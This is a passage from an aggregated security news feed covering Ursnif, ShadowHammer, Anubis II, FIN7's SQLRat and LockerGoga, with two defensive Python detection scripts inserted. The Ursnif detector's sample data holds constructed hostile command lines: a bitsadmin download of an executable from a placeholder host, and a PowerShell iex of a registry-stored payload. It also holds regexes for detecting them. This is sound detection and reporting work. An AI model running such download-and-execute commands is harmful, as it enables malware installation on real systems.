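CHECKIN_KEYS = frozenset({"soft", "version", "user", "server", "id", "crc", "uptime"})
NUMERIC_KEYS = CHECKIN_KEYS - {"user"}

# bitsadmin /transfer fetching from a remote http(s) URL.
BITSADMIN_RE = re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/transfer\b.*?\bhttps?://", re.I)
# PowerShell executing (iex / Invoke-Expression) data read back out of a registry
# value with Get-ItemProperty; the straight or curly quote before HKCU:/HKLM: is optional.
REG_IEX_RE = re.compile(
    r"\b(?:iex|Invoke-Expression)\b.*Get-ItemProperty\s+[\"'\u2018]?HK(?:CU|LM):", re.I
)


def parse_checkin(url):
    """Return the Ursnif check-in parameters carried by `url`, or None.

    All seven parameter names must be present, `user` must be a 32-digit hex
    id and every other value must be an integer, mirroring Table 1.
    """
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items() if v}
    if not CHECKIN_KEYS.issubset(params):
        return None
    if not re.fullmatch(r"[0-9a-f]{32}", params["user"]):
        return None
    if not all(params[k].isdigit() for k in NUMERIC_KEYS):
        return None
    return {k: params[k] for k in sorted(CHECKIN_KEYS)}


def scan_proxy_log(lines):
    """Return a list of (client_ip, params) for every log line carrying a check-in.

    Expected (constructed) line format: '<timestamp> <client> <method> <url>'.
    """
    hits = []
    for line in lines:
        fields = line.split(maxsplit=3)
        if len(fields) != 4:
            continue  # skip malformed lines instead of aborting the scan
        params = parse_checkin(fields[3])
        if params is not None:
            hits.append((fields[1], params))
    return hits


def classify_cmdline(cmdline):
    """Label a process command line as one of the two Ursnif LOLBin steps, or None."""
    if BITSADMIN_RE.search(cmdline):
        return "bitsadmin_download"
    if REG_IEX_RE.search(cmdline):
        return "registry_iex"
    return None


# Constructed sample data (hostnames use the reserved .invalid TLD; the GUID is a placeholder).
PROXY_LOG = [
    "2019-03-12T09:14:03Z 10.0.5.23 GET http://c2.example.invalid/images/a.avi"
    "?soft=3&version=214071&user=b2861874feedbf530d08c77a9d5833de"
    "&server=12&id=822&crc=1&uptime=235",
    "2019-03-12T09:14:05Z 10.0.5.23 GET http://cdn.example.invalid/app.js?version=2&id=5",
    "2019-03-12T09:15:10Z 10.0.5.41 GET http://intranet.example.invalid/login?user=jdoe&id=7",
    "short line",
]
PROCESS_LOG = [
    r'"C:\Windows\System32\cmd.exe" /c bitsadmin  /transfer msd5 /priority foreground '
    r"http://blog.example.invalid/p.php C:\Users\admin\AppData\Local\Temp/eyTWUDW.exe",
    "powershell  iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty "
    r"'HKCU:\Software\AppDataLow\Software\Microsoft\PLACEHOLDER-GUID').amxrters))",
    # Benign look-alikes: a BITS transfer from a UNC share and a plain registry read.
    r"bitsadmin /transfer wu /priority normal \\fileserver\share\update.msi C:\Temp\update.msi",
    r"powershell -Command Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion",
]

if __name__ == "__main__":
    for client, params in scan_proxy_log(PROXY_LOG):
        print(f"check-in from {client}: user={params['user']} version={params['version']}")
    for cmd in PROCESS_LOG:
        print(classify_cmdline(cmd), "<-", cmd[:60])
```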

The content of this additional script is obfuscated with layers of Base64 encoding, arrays of integers and char-code to byte conversions. Dissecting the script we obtained a more readable code:

Figure 6: Script extracted from registry key (left Obfuscated, right Deobfuscated)

The first part contains dependencies loaded by the malware to interact with the OS, such as the classic “kernel32”; more interestingly, one of the last functions called reveals the use of the same APC injection technique observed in previous attack waves to inject the payload into the “Explorer.exe” process (cf. “QueueUserAPC” in “Dissecting the Latest Ursnif DHL themed Campaign”). The de-obfuscation of the central part of the script reveals the classic string “This program cannot be run in DOS mode”, part of the header of the final malware stage that will be injected into the Explorer process.

Figure 7: Ursnif final payload extracted from script

After noticing that the payload is very similar to another Ursnif sample previously analyzed in “Ursnif Long Live the Steganography”, we proceeded with a differential analysis to spot any variations between the samples.

Figure 8: Diff. analysis between already analyzed sample (1)

At first look there are many common parts between the samples: for instance, both files are compiled in 64-bit mode and the values in the PE sections are closely similar. However, the compilation times differ: the older sample dates to 28 January, the newer one to 11 March, almost a week after the command and control host 46.8.18[.186 (CONTEL-NET-3 RU) appeared on the internet.

Figure 9: Diff. analysis between already analyzed sample (2)

Conclusion

Ursnif confirms itself as one of the most active and aggressive malware threats, spreading both worldwide and within the Italian cyber landscape. The threat actors behind these attacks constantly update and vary their infection chains to avoid security controls and evade antivirus detection, luring users with convincing, context-appropriate email messages that are opened by thousands of victims in each attack wave: a serious threat to the security of user data and company assets.

Additional details, including Indicators of Compromise and Yara rules, are available in the report published on the Yoroi Blog.

https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/

Pierluigi Paganini

(SecurityAffairs – Ursnif, malware)

The post The Ursnif Gangs keep Threatening Italy appeared first on Security Affairs.

Security Affairs: Operation ShadowHammer – Supply-Chain attack hit ASUS users

Operation ShadowHammer – ASUS is the latest victim of a high-profile supply chain attack that delivered a backdoor to more than one million users, Kaspersky Lab reported.

Over 1 million ASUS users may have been impacted by a supply chain attack that leveraged the ASUS Live Update utility to inject a backdoor in ASUS systems.

Kaspersky tracked the attack as Operation ShadowHammer. It took place between June and November 2018, but experts only discovered it in January 2019.

“In January 2019, we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility. The attack took place between June and November 2018 and according to our telemetry, it affected a large number of users.” reads the analysis published by Kaspersky Lab.

The ASUS Live Update utility is pre-installed on most ASUS computers and allows the vendor to automatically update several components, including drivers, BIOS, UEFI, and applications. Hackers also digitally signed their malware with a stolen digital certificate used by ASUS to sign legitimate binaries, a technique already observed in other supply chain attacks such as the CCleaner and ShadowPad hacks.

Experts pointed out that Operation ShadowHammer was a targeted attack that surgically hit only 600 specific MAC addresses, but Kaspersky couldn’t determine the exact number of users who installed the tainted utility.

Based on Kaspersky’s statistics, over 57,000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time. Experts estimate that the extent of the problem is huge and it is possibly affecting over a million users worldwide.

“The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses.” continues Kaspersky.

“To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.”

Threat actors behind Operation ShadowHammer delivered signed, backdoored versions of the ASUS software. The software was hosted and distributed through the official ASUS update servers; experts described this supply chain attack as very sophisticated.

“While this means that potentially every user of the affected software could have become a victim, actors behind ShadowHammer were focused on gaining access to several hundreds of users, which they had prior knowledge about,” Kaspersky Lab continues.

Once the backdoor is executed on a victim’s device, the malicious code checks the MAC address against a list of addresses. If the MAC address is in the list, the infection continues; otherwise, the malware remains hidden.

Attackers used a modular approach and took extra precautions when executing code to avoid detection. Kaspersky experts argue the attackers are very advanced and that their arsenal reflects a very high level of development within the group.

Kaspersky experts attribute the attacks to the BARIUM APT group, the same threat actor behind the ShadowPad and CCleaner supply chain attacks.

The BARIUM APT is believed to be under the Winnti umbrella along with other APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, LEAD, PassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and procedures (TTPs) and in some cases shared portions of the same hacking infrastructure.

Below the geographic distribution of the victims of Operation Shadowhammer.


According to Kaspersky, at least three other vendors in Asia were hit with similar attack techniques.

“The selected vendors are extremely attractive targets for APT groups that might want to take advantage of their vast customer base,” said Vitaly Kamluk, Director of Global Research and Analysis Team, APAC, at Kaspersky Lab. “It is not yet very clear what the ultimate goal of the attackers was and we are still researching who was behind the attack.”

Kaspersky has released a tool that allows users to determine whether they were impacted; the company also plans to provide additional information on the incident at its SAS 2019 conference.

Pierluigi Paganini

(SecurityAffairs – Asus, supply chain attack)

The post Operation ShadowHammer – Supply-Chain attack hit ASUS users appeared first on Security Affairs.




Security Affairs: Anubis II – malware and afterlife

Due to the growing demand for Android banking malware, threat actors continue using Anubis even though its creator has vanished.

Introduction

Besides being the Egyptian God associated with mummification and afterlife, Anubis is also an Android banking malware that has caused quite some trouble for over 300 financial institutions worldwide since 2017.

Anubis II is the Android banking Trojan created and advertised by an actor with the nickname “maza-in”. This malware family goes beyond the well-known overlay attacks by combining advanced features such as screen streaming, remote file browsing, sound recording, keylogging and even a network proxy, making it an efficient banking malware but also a potential spying tool. Effectively, Anubis can be considered one of the most used Android banking Trojans since late 2017.

As banking malware, Anubis operates by tricking its victims into providing personal and sensitive information such as online banking credentials, banking security codes and even credit card details. Many victims do not realise that the malware application does not pretend to be the bank; it mostly hides as a third-party app and therefore remains under the radar of the average user. Disguises used by Anubis were, for example: fake mobile games, fake software updates, fake post/mail apps, fake flash-player apps, fake utility apps, fake browsers and even fake social-network and communication apps.

The malware was rented privately to a limited number of “customers”: criminals willing to use such malware to perform fraud. At the moment of writing, the renting service is supposedly disrupted due to the author being under arrest or having simply vanished with customers’ money, but the malware itself is alive and kicking.

Through this blog post ThreatFabric experts revisit major stages of Anubis’ evolution and explain what changes can be expected on the threat landscape.

Origins: It all started with BankBot

In December 2016 the actor “maza-in” wrote an article named “Android BOT from scratch” in which he shared source code of a new Android banking Trojan capable of sending and intercepting text messages as well as performing overlay attacks to steal credentials.

The article received a lot of attention as it contained sources of both the C2 panel and the Android client (bot), giving actors the tools to create a working banking Trojan with minimum effort. The first malware based on the code from this article was spotted by Dr. Web in Jan 2017 and was dubbed “Android.BankBot.149.origin”. Although a generic name for banking malware, “BankBot” became the name attributed to all Trojans derived from the shared source code.


Throughout 2017, many actors used BankBot for their fraudulent operations, but without proper support and updates most abandoned the malware months later. Some however used the source code to build their own malware. Some examples are:

- LokiBot (2017) – the actor behind this malware adapted the original code and introduced ransomware and proxy capabilities
- Razdel (2017) – a banking malware that primarily targets Central European banks; introduced a novel trick to implement overlay attacks
- MysteryBot (2018) – another malware from the same actor behind “LokiBot”; introduced a novel keylogging approach and an on-device fraud technique
- CometBot (2019) – a copy of the original code with minor modifications, primarily targeting German banks at the moment

Although most actors reusing the original code changed the Trojan into something that suited their respective needs, all of them also kept the features from the original shared code. The list of these original features is very limited compared to recent banking Trojans but enough to steal personal information from the victims:

- Overlaying: Dynamic – C2 based (possibility to remotely modify the list of targeted applications)
- SMS blocking (hiding messages from the victim)
- SMS sending (capability to send messages from the infected device)
- SMS harvesting (possibility to send a copy of all messages to the C2 server)

About Anubis

Rise of maza-in

By publishing the aforementioned article, maza-in earned himself a reputation as an Android expert on underground forums. He started to share tips and tricks to help other threat actors deal with technical issues and enhance their own malware. Shortly after the initial article, the actor even gave an interview to Forbes magazine titled “I Want To Expose Google’s Mistakes”, stating that he published the malicious code to improve the state of Android security by showing design flaws in the system that can be easily abused.

He also frequently reviewed each new Android banking Trojan available for renting. In his reviews, he evaluated the technical capabilities and provided his opinion about the actor. Later, a review by maza-in almost became a de facto step to start rental of Android banking malware, as users of forums were asking for the review before they would buy/rent a new Trojan.

Although claiming to have the most noble intentions, maza-in also pursued more nefarious goals. Information from forums shows that at the same time he shared the code of the Trojan in the tutorial article, he was developing a “full” version of the Trojan privately. After some time he started to privately rent it.

The malware was heavily enhanced compared to its original version, adding modern overlaying techniques, device screen recording and streaming, a network proxy feature, keylogging and the ability to steal files from the infected device. maza-in named the malware Anubis and used the following logo in his advertisement of the malware:


The list of bot features below shows how much maza-in improved upon the original shared BankBot code to create (the latest version of) Anubis:

- Overlaying: Static (hardcoded in bot)
- Overlaying: Dynamic (C2 based)
- Keylogging
- Contact list collection
- Screen streaming
- Sound recording
- SMS harvesting: SMS forwarding
- SMS blocking
- SMS sending
- Files/pictures collection
- Calls: USSD request making
- Ransomware: Cryptolocker
- Remote actions: Data-wiping
- Remote actions: Back-connect proxy
- Notifications: Push notifications
- C2 Resilience: Twitter/Telegram/Pastebin C2 update channels

In addition to the new features and improvements made, Anubis also has a larger (default) target list. In the Appendix you can find a full list of apps targeted by Anubis (437 applications in total).

Distribution

As a rented Trojan, Anubis was distributed using a wide range of delivery techniques:

- Google Play campaigns: using self-made or rented droppers, actors were able to bypass Google Play security mechanisms and spread the Trojan through the official app store, potentially infecting thousands of victims at a time.
- Spam campaigns: using SMS or email, actors sent messages to social-engineer the victims with a request to install or update some legitimate application, instead linking to the malware.
- Web redirection of the victim to a fake landing page containing a request to install or update some legitimate application, instead linking to the malware; using advertisements on websites, hacked sites, traffic exchanges and other black-hat SEO methods.

It is in the interest of the actors to infect as many devices as possible as it increases the chances to commit fraud successfully. The problem for Play Store users is that even without being social-engineered, due to the increasing number of Google Play malware campaigns, the risk of downloading a dropper mimicking a benign application has increased significantly. Therefore the statement “only download apps from the official app store” is not enough to remain safe from malware.

Recent updates

The rental of Anubis II was open from Q4 2017 until February 2019. During Q1 2019, actor maza-in vanished from the threat landscape, leaving existing customers without support and updates. Although exact details about the vanishing of the actor remain unclear at the time of writing, a chain of events confirms that some abnormal activity took place around Anubis and its author:

- On December 13 2018 maza-in announces the release of Anubis 2.5; seemingly only redesigning the backend web interface, while actually stating that he rewrote the whole bot code.
- On January 16 2019 Anubis code is leaked in an underground forum (both backend code and unobfuscated APK).
- On February 14 2019 for the first time an Anubis sample seen targeting Russian banks only is spotted (indicating a new campaign / new operator).
- On February 25 2019 some complaints from Anubis customers appear in underground forums stating that maza-in and Anubis support no longer reply to messages.
- On March 04 2019, the admin of one underground forum states maza-in got arrested. Shortly after this, accounts of maza-in are banned on multiple forums.
- During March 2019, actor Aldesa (who shares a connection with maza-in) creates a post to sell the so-called “Anubis 3” malware on an underground forum. His post gets removed by the admin quite quickly.

We can conclude that the Anubis Trojan is no longer officially rented. However, ThreatFabric experts have observed certain Anubis customers having access to the builder and admin panel, which explains why the operations have not been totally disrupted.

Although it is hard to say why maza-in really vanished, the fact that some code has been leaked combined with recent observations of unobfuscated Anubis samples in the wild, may suggest that the malware will be used by other actors and thus remain active.

What we learned from history

In the past, several other banking Trojans have seen their operations being disrupted and/or source code leaked. It often results in a decrease in the operations and number of samples generated, but most often activity resumes after some quiet time.

There might be several explanations for this, such as actors/operators being scared of sudden changes, possibly indicating take-downs or arrests; the time needed to get hands on the right resources and accounts to resume operations; the delay between the moment operations stop and the leaking of source code; etc. In some cases, the calm after the storm resulted in some new variants appearing on the threat landscape, indicating the delay was probably due to the need for other actors to build their own malware version/variant based on the leaked code.

Marcher

In 2016, the operations of another popular Android banking malware named Marcher were disrupted in a similar way to what happened to Anubis. The actor behind the Marcher Trojan got banned and the renting service was discontinued. The renting model of that Trojan allowed purchase of the APK (bot) builder, therefore a number of Marcher actors obtained the source code of the admin panel and the bot itself.

Some of them resold the sources and some of them used them as a base for their own banking malware; therefore, although operations were disrupted, the Trojan remained active for a while and new malware families emerged. Examples of modern families based on Marcher are:
- ExoBot
- Gustuff
- DiseaseBot
- Bubabot
- Neobot

Even now it sometimes happens that new Marcher-based Trojans appear on the threat landscape.

The story repeats itself

Looking at the current situation for Anubis, several scenarios are possible:
- Actors having access to the relevant resources continue using Anubis in its current state.
- Some actor or actor group steps in and becomes the new maintainer of Anubis, and business starts over.
- Actors stop using Anubis and wait for some new banking malware to become available.
- Actors having access to the relevant resources start to modify and improve the existing code base to create their own malware.

As mentioned before, Anubis itself is based on the BankBot Trojan, which was made public on purpose. This resulted in the appearance of at least 4 distinct malware families/variants, as shown in the picture hereunder:

BankBot Tree

We can say that Anubis itself also sprang into existence from the publicly available BankBot code. Considering the increasing demand for Android banking malware and the fact that unobfuscated versions of the bot and the code of the Anubis admin panel are publicly available, we can definitely expect similar events.

Anubis statistics

As Anubis is a rented banking Trojan, each buyer/operator can decide the effective list of applications the Trojan should target. This results in many different campaigns with different objectives.

Although there have been several different campaigns targeting different sets of applications, when considering the average Anubis sample, the number of targets is approximately 370 unique applications.

Target locations

Based on the countries for which the targeted applications are made, it is possible to make statistics of the number of targets per region.

As can be seen in the following chart, there is a strong interest in institutions providing services in Europe, Asia and the Americas:

Targets per region

When we narrow this down to subregions, we can see that the targets are in fact institutions active in Europe, West Asia, North America and Australia.

Interestingly, those locations match banking malware’s “usual suspects”; many of the previously observed banking malware families have been seen primarily targeting financial institutions in those subregions.

Targets per subregion

Anubis has been targeting applications from financial institutions present in more than 100 different countries. The top 20 victim countries are visible in the following chart:

Targets per country

Keep in mind that statistics can be slightly biased due to certain applications serving a large number of different countries.

Target types

Based on the application types provided by Google for the targeted applications, we can see that although the Anubis Trojan is a banker and therefore mainly targets “Finance” apps, it also has an interest in other types of apps.

As visible in the following chart, the application types in second and third position of interest are “Shopping” and “Business” apps, which can be explained by the fact that it shouldn't look suspicious to the victim when such applications request an update of payment details or other sensitive information.

After “Finance” apps, the app types of second choice are “Shopping” and “Business”, followed by “Tools”, “Communication” and “Social” apps. Therefore, keep in mind that although such malware is called banking malware, its aim is to perform fraud, and it therefore targets more than only financial apps to achieve its goal.

Target types

In conclusion, what’s next

Considering the growing demand for Android banking malware, we can definitely expect actors to continue using Anubis. Although the creator has vanished the threat is still real; the malware will continue to operate and provide its advanced features to ill-intentioned actors.

We can expect the following events to take place:
- Anubis customers having sufficient resources will continue to use the Trojan.
- As some actors have access to both the Anubis admin panel and builder, it's likely they will try to sell it themselves.
- Some disgruntled customers having access to the sources might leak additional code and resources as retaliation.
- As it's known that some actors have access to the right resources, we can expect some enhancements and maybe even new features.

If those events indeed take place, it will result in new actors using Anubis, new campaigns and maybe even new malware variants or malware families based on the Anubis code.

Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud; Anubis is only one of the many Trojans active in the wild!

Further info, including Anubis II samples, is reported in the original analysis published by ThreatFabric.

https://www.threatfabric.com/blogs/anubis_2_malware_and_afterlife.html

Pierluigi Paganini

(SecurityAffairs – malware, Anubis II)

The post Anubis II – malware and afterlife appeared first on Security Affairs.


Security Affairs: Hackers raised fake tornado alarms in two Texas towns

Hackers took control of the emergency tornado alarms in two Texas towns, causing panic among residents; it happened on March 12th, at around 2:30 a.m.

On March 12th, at around 2:30 a.m., in two towns in Texas (the DeSoto and Lancaster areas), hackers took control of the emergency tornado alarms, causing panic among residents.

The alarms repeatedly went on and off until 4:00 a.m., when authorities regained control of them.

The areas affected by the incident were hit by tornadoes several times in the past; for this reason, the authorities built an emergency tornado alarm system.

Every time people hear the emergency tornado alarms, they need to follow specific procedures to protect themselves against the natural disaster.

The hackers raised at least 30 alarms, twenty of them in Lancaster and the rest in DeSoto.

The systems remained offline until Monday 17th March; fortunately, there was no imminent risk of tornadoes in that period.

The police are investigating the intrusion into the alarm systems of the two towns; the authorities will be intransigent with those who have breached a critical system on which human lives may depend.

Pierluigi Paganini

(SecurityAffairs – emergency tornado alarms, hacking)


The post Hackers raised fake tornado alarms in two Texas towns appeared first on Security Affairs.


E Hacking News – Latest Hacker News and IT Security News: Zero-day Stored XSS Vulnerability Allowed Attackers to Compromise 70,000 Websites



Researchers found out that "Social Warfare", a social sharing plug-in developed by Warfare Plugins, is affected by a critical stored XSS zero-day flaw which allows cybercriminals to inject malicious scripts and take over vulnerable WordPress websites.

'Social Warfare' is a social sharing plugin that website owners use to gain more traffic by receiving more social shares.

Among the plugin's debugging features, the plug-in carries exploitable code which allows the payload to be stored in the website's database and retrieved with every page request.

According to Sucuri's research, “These features aren't directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.”

The flaw, which has been widely exploited across the globe, is critical: it has allowed attackers to gain full control of unprotected websites.

As the abuse of the flaw continued, analysts observed multiple ongoing attempts from over a hundred distinct IP addresses.

Reportedly, around 70,000 websites have the plugin installed, and the attacks are likely to multiply if the flaw is left unpatched. Meanwhile, experts advise users to update to version 3.5.3.


PewDiePie ransomware forcing users to subscribe him on YouTube

By Waqas

T-Series vs. PewDiePie Battle Takes an Ugly Turn: PewDiePie Fans Launch PewDiePie Ransomware to Get Followers. The battle between T-Series and PewDiePie for the top slot on YouTube is getting more fierce and dramatic day by day. Where T-Series fans are supporting the Indian music company, PewDiePie fans have resorted to extreme measures in making […]

This is a post from HackRead.com Read the original post: PewDiePie ransomware forcing users to subscribe him on YouTube

FIN7 is back with a previously unseen SQLRat malware

The financially-motivated hacking group FIN7 is back and used a new piece of malware in a recent hacking campaign.

Security experts at Flashpoint revealed that the financially-motivated cybercrime group FIN7 (aka Anunak and Carbanak) used new malware in a recent hacking campaign.

The group, which has been active since late 2015, targeted businesses worldwide to steal payment card information. FIN7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

In August 2018, three members of the notorious cybercrime gang were indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

Despite law enforcement activity against the group, Flashpoint experts have discovered a new administrative panel associated with previously undetected malware samples. The new malicious code was used in a hacking campaign tracked as Astra that was carried out from May to July 2018, but the experts did not rule out that the attack may have started in January 2018.

“Flashpoint analysts recently uncovered a new attack panel used by this group in campaigns they have called Astra. The panel, written in PHP, functions as a script-management system, pushing attack scripts down to compromised computers.” reads the analysis published by Flashpoint.

“Analysts discovered references to the FIN7 front company Combi Security in the Astra panel’s backend PHP code, connecting the group to these campaigns.”

The administrative panel discovered by the researchers is written in PHP and is used by attackers to send attack scripts to compromised computers.

Experts discovered references to the FIN7 front company Combi Security in the Astra panel’s backend PHP code.

According to the US DoJ, the security services company Combi Security was based in Russia and Israel and was used by FIN7 to recruit other hackers.

The attack chain starts with spear-phishing messages containing malicious attachments; the messages are specially crafted to trick victims into opening the message and executing the attached document.

The messages would deliver a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The emails would also drop the backdoor DNSbot that primarily operates over DNS traffic.

“One of the documents spreads what analysts are calling SQLRat, previously unseen malware that drops files and executes SQL scripts on the host system. The use of SQL scripts is ingenious in that they don’t leave artifacts behind the way traditional malware does.” continues the analysis. “Once they are deleted by the attackers’ code, there is nothing left to be forensically recovered. This technique has not been observed in previous campaigns associated with FIN7.”

SQLRat connects directly to a Microsoft SQL database under the attackers’ control and executes the contents of various tables.


The script retrieves a version of TinyMet (an open source Meterpreter stager); the attackers can also deliver other binaries loaded into the tables.

“The Astra backend was installed on a Windows server with Microsoft SQL. The panel was written in PHP and managed the content in the tables. It functioned as a script management system,” Flashpoint said. 
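As an added example (not Flashpoint’s code), a small hunt over constructed Sysmon-style network events for the connection shape SQLRat relies on: an ordinary endpoint process opening TCP/1433 straight to a Microsoft SQL server. The event records and the allowlist of SQL client binaries are assumptions for the demo.

```python
"""Hunt for endpoint processes that open a direct connection to an external
Microsoft SQL server.

Added example, not Flashpoint's code. SQLRat, as described above, connects
from the victim host straight to an attacker-controlled Microsoft SQL
database and executes whatever the tables hold; the SQL scripts leave few
artifacts on disk, so the network connection itself is the durable signal.
The records below are constructed to resemble Sysmon Event ID 3 (network
connection) entries already parsed into dicts; the allowlist of SQL client
binaries is an assumption to tune per environment.
"""
import ipaddress

MSSQL_PORTS = {1433}
# Binaries expected to speak to SQL Server from a workstation (assumed).
KNOWN_SQL_CLIENTS = {"ssms.exe", "sqlcmd.exe", "azuredatastudio.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

SAMPLE_EVENTS = [  # constructed; 203.0.113.0/24 is a documentation range
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 1433, "User": r"CORP\jdoe"},
    {"Image": r"C:\Tools\ssms.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 1433, "User": r"CORP\dba"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 1433, "User": r"CORP\jdoe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443, "User": r"CORP\jdoe"},
]


def is_internal(ip_text):
    """True when the address falls inside one of the internal ranges."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def hunt_mssql_egress(events):
    """Return an alert for every MSSQL connection made by a non-SQL-client process."""
    alerts = []
    for ev in events:
        if int(ev["DestinationPort"]) not in MSSQL_PORTS:
            continue
        process = ev["Image"].rsplit("\\", 1)[-1].lower()
        if process in KNOWN_SQL_CLIENTS:
            continue
        # A script host reaching a public SQL endpoint is the SQLRat shape;
        # the same process reaching an internal server still merits a look.
        severity = "medium" if is_internal(ev["DestinationIp"]) else "high"
        alerts.append({
            "process": process,
            "user": ev["User"],
            "destination": "%s:%s" % (ev["DestinationIp"], ev["DestinationPort"]),
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for alert in hunt_mssql_egress(SAMPLE_EVENTS):
        print(alert)
```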

Pierluigi Paganini

(SecurityAffairs – FIN7, Astra)

The post FIN7 is back with a previously unseen SQLRat malware appeared first on Security Affairs.




Security Affairs

South Korea – 1,600 guests at 30 motels secretly live streamed

Four people from South Korea are accused of secretly live streaming and selling videos made with spy cams installed in 42 motel rooms at 30 motels in 10 cities in South Korea.

According to the media, 1600 motel guests between November 24 and March 2 were spied on by the indicted individuals, who now face up to five years in prison, as well as a ₩30 million fine along with a ₩10 million penalty for porn distribution.

The group used wireless micro IP cameras hidden in motel rooms at 30 motels in 10 cities in the North and South Gyeongsang and Chungcheong Provinces.

The cameras with 1-millimeter lenses were planted in TV media boxes and power sockets.

Image: hidden camera (source: Yonhap News Agency)

The group transmitted the videos via a streaming website that used servers abroad. According to the investigators, the site had 4099 registered users; the gang sold 803 videos and earned $6,200.

“The site had more than 4,000 members, 97 of whom paid a $44.95 monthly fee to access extra features, such as the ability to replay certain live streams. Between November 2018 and this month, police said, the service brought in upward of $6,000.” reported CNN.

The South Korean authorities confirmed that other similar cases have happened in the past.

“There was a similar case in the past where illegal cameras were (secretly installed) and were consistently and secretly watched, but this is the first time the police caught where videos were broadcast live on the internet,” police said.

South Korean authorities confirmed that spy-cam sites and revenge porn are common crimes in the country, as reported in a press release published by the Copyright Protection Division of South Korea’s Ministry of Culture, Sports and Tourism.

“The police agency strictly deals with criminals who post and share illegal videos as they severely harm human dignity,” reads a statement issued by the Seoul Metropolitan Police Agency.

It is quite easy to buy spy cam detectors in South Korea; The Korea Times revealed that sales of these devices spiked in March 2019 after media reported the case of a South Korean singer who secretly recorded videos of his partners and shared them with friends.

In September 2018, the South Korean government carried out a campaign that led to the inspection of thousands of public toilets for hidden cams.

The fight against this kind of crime included doubled prison sentences for people involved in such illegal activities.

Pierluigi Paganini

(SecurityAffairs – South Korea, revenge porn)

The post South Korea – 1,600 guests at 30 motels secretly live streamed appeared first on Security Affairs.


[SI-LAB] LockerGoga is the most active ransomware that focuses on targeting companies

LockerGoga is the most active ransomware; experts warn that it focuses on targeting companies and bypasses AV signature-based detection.

LockerGoga ransomware is a crypto-malware that loads the malicious file on the system from an infected email attachment.

This threat is very critical these days, and it is the most active ransomware that focuses on targeting companies. Altran and Norsk Hydro are two companies severely affected by this wave, and the damage is huge.

Altran said on Monday it had shut down its IT network and applications and a recovery plan was under way.

On the other hand, the aluminum giant, Norway’s Norsk Hydro, said on Tuesday 19th that it was hit by a ransomware called LockerGoga.

“Hydro became victim of an extensive cyberattack in the early hours of Tuesday, impacting operations in several of the company’s business areas,” reads a statement issued by the company.

The first public mention of the Altran cyber attack was seen in a tweet on January 25th, which received a reply from a computer security researcher who hinted that a malware sample uploaded to VirusTotal was behind the attack.

The aluminum giant was also heavily impacted, with notes left by the security department asking employees to keep their computers and mobile devices disconnected from the Hydro network.


The ransomware’s name comes from the path used when compiling the source code into the executable, discovered by MalwareHunterTeam:

  X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\rijndael_simd.cpp

According to a Recorded Future graphic, LockerGoga was first observed on January 24th in Romania and later in the Netherlands. The first big hit was the Altran attack, and now Norway’s Norsk Hydro has also seen its infrastructure severely compromised by this ransomware.


During the SI-LAB analysis, this ransomware bypassed AV signature-based detection: a sample with a score of 0/69 was submitted to VirusTotal on March 8th, 2019 and nothing was detected.


In addition, the ransomware has also not been detected by Microsoft Windows Defender. This means that any company within the attacker’s scope could be compromised by crooks.

Note that the ransomware is probably detected during antivirus behavioral analysis; heuristic and signature-based detection are easily bypassed.

The threat is signed with a valid digital certificate. It’s issued by Comodo Certificate Authority (acquired by Francisco Partners and known by its new brand name Sectigo) for code signing.


SI-LAB observed the ransomware will normally target DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files.

If the ransomware is launched with the ‘-w’ command line argument, it targets all file types. Other supported switches are ‘-k’ and ‘-m’, for Base64 encoding and for providing the email addresses to show in the ransom note.

Another interesting thing is that the ransomware sample launches itself with the -w argument and also spawns a new process for each file it encrypts, which makes the encryption process very slow.

All the encrypted files are renamed and the extension “.locked” is appended.

After encryption, it will drop a ransom note named README-NOW.txt on the victim’s desktop, which includes instructions to contact the SuzuMcpherson@protonmail.com or AsuxidOruraep1999@o2.pl email addresses for payment instructions.


Users who receive this kind of threat need to pay attention and report the situation as fast as possible. As seen, this ransomware can easily bypass AV protections, and a bad decision can compromise an entire infrastructure, impacting the lives of hundreds of people.

More details about LockerGoga follow in the Technical Analysis section.

Technical Analysis – LockerGoga

File name: yxugwjud6698.exe
Threat: LockerGoga ransomware
Ransom note: README-NOW.txt
File Extension: .locked
Encryption Algorithm: RSA-4096 and AES-256
SHA-256: eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0
LockerGoga is a ransomware family that was initially discovered after attacks were launched against European companies, such as Altran Technologies in France and also Norsk Hydro.

